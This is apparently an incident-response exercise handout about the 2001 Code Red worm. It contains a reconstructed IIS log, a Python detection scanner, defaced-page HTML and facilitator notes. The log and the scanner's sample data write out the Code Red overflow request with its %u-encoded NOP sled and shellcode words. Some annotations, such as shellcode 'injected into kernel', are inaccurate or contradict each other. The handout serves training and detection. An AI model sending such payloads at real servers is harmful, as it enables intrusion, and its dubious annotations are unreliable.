Handout A: IIS Access Log Analysis

Forensic extract from a Microsoft IIS 5.0 access log. These requests show the actual Code Red buffer overflow exploit pattern and the subsequent defacement.


IIS Access Log (July 13, 2001 - First Infection)

#Software: Microsoft Internet Information Server 5.0
#Version: 1.0
#Date: 2001-07-13
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes sc-bytes

[2001-07-13 14:17:23] 192.168.1.50 GET /
                      200 1245 4819

[2001-07-13 14:17:45] 203.45.67.89 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u56eb%u5645%u93f0%u0000
                      500 512 2200
                      [BUFFER OVERFLOW ATTACK - INDEXING SERVICE VULNERABLE]

[2001-07-13 14:17:46] 203.45.67.89 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u56eb%u5645%u93f0%u0000
                      500 512 2200
                      [RETRY - EXPLOIT CODE INJECTED INTO KERNEL]

[2001-07-13 14:17:47] 203.45.67.89 GET / HTTP/1.0
                      200 4819 1200
                      [VERIFICATION REQUEST - MALWARE NOW RUNNING ON SERVER]

[2001-07-13 14:18:03] 127.0.0.1 GET /default.htm HTTP/1.1
                      304 0 4819
                      [CACHED - UNCHANGED]

[2001-07-13 15:14:22] 127.0.0.1 POST /iisadmin/admin/default.htm HTTP/1.1
                      200 256 18492
                      [SERVER PROCESS ATTEMPTING FILE MODIFICATION]

[2001-07-13 15:14:45] 127.0.0.1 GET /default.htm HTTP/1.1
                      200 18492 4819
                      [MODIFIED FILE RETURNED - DEFACEMENT SUCCESSFUL]

IM NOTES (Do Not Show to Players): Technical analysis:

  1. Exploit Pattern: The long string of NNNNNNNNNNNNNN... followed by %u9090 (NOP sled) and hex values (shellcode) is the classic Code Red buffer overflow. The request is deliberately malformed to overflow the idq.dll input parsing buffer.

  2. Exploitation Success: The 500 error on the first attempt is expected – the exploit is triggering the overflow. The second attempt at 14:17:46 is the retry with the actual malicious shellcode injected. The third request at 14:17:47 succeeds (200 OK), indicating the malware is now running.

  3. Local Defacement: By 15:14, the server’s own processes (127.0.0.1 = localhost) are modifying files. This shows the worm has taken control and is defacing the website.

  4. No User Interaction: All of this happens automatically. There’s no “click here” or social engineering; the vulnerability is exploited without any action by a user.
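Added example (not part of this handout): a small Python scanner that applies the analysis above to W3C-format IIS log lines. It parses the #Fields header, flags requests to the .ida/.idq ISAPI handlers whose query carries a long padding run followed by %u-encoded words (decoding those words to count the 0x90 NOP bytes the notes describe), and flags loopback POSTs to the admin path. The sample lines are constructed from the handout's entries, the 100-character padding threshold and the 4-NOP minimum are assumed tuning values, and the 'X' padding variant is included for the later Code Red II worm.

```python
"""Detection-oriented scan of W3C-style IIS log lines for the Code Red
request pattern.  Added example for the handout; sample lines are
constructed, and the thresholds below are assumptions, not vendor values."""
import re
from typing import Dict, List

# Constructed sample in the handout's field order (not a real capture).
# The padding length is an assumption; the %u words are the handout's own.
N_RUN = "N" * 224
EXPLOIT_QUERY = N_RUN + ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
                         "%u9090%u9090%u8190%u00c3%u0003%u56eb%u5645%u93f0%u0000")

SAMPLE_LOG = f"""#Software: Microsoft Internet Information Server 5.0
#Version: 1.0
#Date: 2001-07-13
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes sc-bytes
14:17:23 192.168.1.50 GET / - 200 1245 4819
14:17:45 203.45.67.89 GET /default.ida {EXPLOIT_QUERY} 500 512 2200
14:17:46 203.45.67.89 GET /default.ida {EXPLOIT_QUERY} 500 512 2200
14:17:47 203.45.67.89 GET / - 200 4819 1200
14:18:03 127.0.0.1 GET /default.htm - 304 0 4819
15:14:22 127.0.0.1 POST /iisadmin/admin/default.htm - 200 256 18492
15:14:45 127.0.0.1 GET /default.htm - 200 18492 4819
"""

U_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})")
# 100+ repeats of N (Code Red) or X (Code Red II); threshold is assumed.
PAD_RUN = re.compile(r"([NX])\1{99,}")
MIN_NOPS = 4  # assumed minimum count of 0x90 bytes to call it a sled


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; a real tool would report it
        records.append(dict(zip(fields, values)))
    return records


def decode_u_words(query: str) -> bytes:
    """Turn %uXXXX tokens into the little-endian bytes an x86 server sees."""
    out = bytearray()
    for hexword in U_TOKEN.findall(query):
        out += int(hexword, 16).to_bytes(2, "little")
    return bytes(out)


def classify(rec: Dict[str, str]) -> str:
    """Return a finding tag for one record, or '' when nothing matches."""
    stem = rec["cs-uri-stem"].lower()
    query = rec["cs-uri-query"]
    if stem.endswith((".ida", ".idq")):
        pad = PAD_RUN.search(query)
        nops = decode_u_words(query).count(0x90)
        if pad and nops >= MIN_NOPS:
            return (f"ISAPI_OVERFLOW pad={len(pad.group(0))} "
                    f"nop_bytes={nops} status={rec['sc-status']}")
        return "ISAPI_PROBE"  # Indexing Service touched without a payload
    if (rec["c-ip"] == "127.0.0.1" and rec["cs-method"] == "POST"
            and stem.startswith("/iisadmin/")):
        return "LOCAL_ADMIN_WRITE"  # server process writing via its own admin path
    return ""


def scan(text: str) -> List[Dict[str, str]]:
    """Run classify() over every record and keep the hits, in log order."""
    findings = []
    for rec in parse_w3c(text):
        tag = classify(rec)
        if tag:
            findings.append({"time": rec["time"], "c-ip": rec["c-ip"], "finding": tag})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['c-ip']:<15} {f['finding']}")
```

Run directly it prints the three findings as a timeline: two ISAPI_OVERFLOW hits with status 500 and one LOCAL_ADMIN_WRITE. In practice the same classify() would run over each day's exYYMMDD.log file; the 500 responses on the .ida requests are themselves a useful correlator, since a triggered overflow tends to show up as a server error rather than a clean 200.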


Website Content Before and After Defacement

BEFORE (Normal Academic Website)

<html>
<head><title>Computer Science Department - University Technology Services</title></head>
<body bgcolor="#ffffff">
<h1>Department of Computer Science</h1>

<p>Welcome to the Computer Science Department. We offer courses in algorithms,
data structures, systems programming, and networking.</p>

<h2>Summer 2001 Courses</h2>
<ul>
<li>CS101 - Introduction to Programming</li>
<li>CS201 - Data Structures</li>
<li>CS301 - Operating Systems</li>
</ul>

<p><a href="/student-portal/">Student Course Registration</a></p>
</body>
</html>

AFTER (Defaced by Code Red)

<html>
<head><title>HACKED!</title></head>
<body bgcolor="#000000" text="#ff0000">
<h1>HELLO! Welcome to http://www.worm.com! Hacked By Chinese!</h1>

<p><img src="http://219.145.116.68/worm.jpg"></p>

<h1>Computer Science Department - DEFACED</h1>

[REMAINDER OF ORIGINAL CONTENT INACCESSIBLE]
</body>
</html>

IM NOTES (Do Not Show to Players): Key historical details:

  1. Consistent Defacement Message: “HELLO! Welcome to http://www.worm.com! Hacked By Chinese!” appeared on hundreds of thousands of servers worldwide. This hardcoded message was in the worm’s binary, NOT a separate attack.

  2. Dynamic Hosting: The image reference to 219.145.116.68/worm.jpg was originally a hosted image, but security researchers quickly took down the server. Many archived defaced pages show just the broken image reference.

  3. Attribution Confusion: The “Hacked By Chinese!” message led to global headlines about “Chinese hackers.” In reality, it was most likely misdirection by the worm authors or a false-flag message. No credible evidence of Chinese government involvement was ever found. This is one of the first examples of attribution confusion in major cyber incidents.

  4. In-Memory Modification: Interestingly, the defacement in Code Red was NOT written to disk. The malware modified the web content IN MEMORY ONLY. When the server rebooted, the original files were still intact on disk. This is why the worm was called “memory-resident”, and it made response complex – you couldn’t just restore from backup.


Key Discovery Questions

  • What does the long string of NNNNNNNNNNN followed by %u9090 accomplish?

The Ns overflow the buffer. The %u9090 sequence (which decodes to NOP instructions in x86 assembly) creates a “landing pad” for the shellcode: a hijacked return address only has to land somewhere inside the NOP sled, and execution slides down to the real shellcode and runs it. This is the classic buffer overflow exploitation pattern.

  • Why would the malware deface the website with a message, rather than quietly stealing data?

Code Red was not designed for espionage or data theft. It was designed for automated attack propagation and DDoS. The defacement served as proof of concept and (possibly) misdirection. The real payload was the worm’s ability to scan and infect other servers automatically.

  • How would you restore a defaced website if the malware is in-memory only?

This was the conundrum for incident responders in 2001. Simply restoring backup files didn’t help if the worm reinfected them. The only lasting solution was: (1) patch the vulnerability, (2) restart the service, and (3) kill all infected server processes. Backup restoration alone would fail.

IM Facilitation Notes

This handout shows the moment of initial exploitation. It helps players understand:

  • Automated exploitation at internet scale
  • Defacement as propaganda/proof of concept
  • The exploitation-to-infection pipeline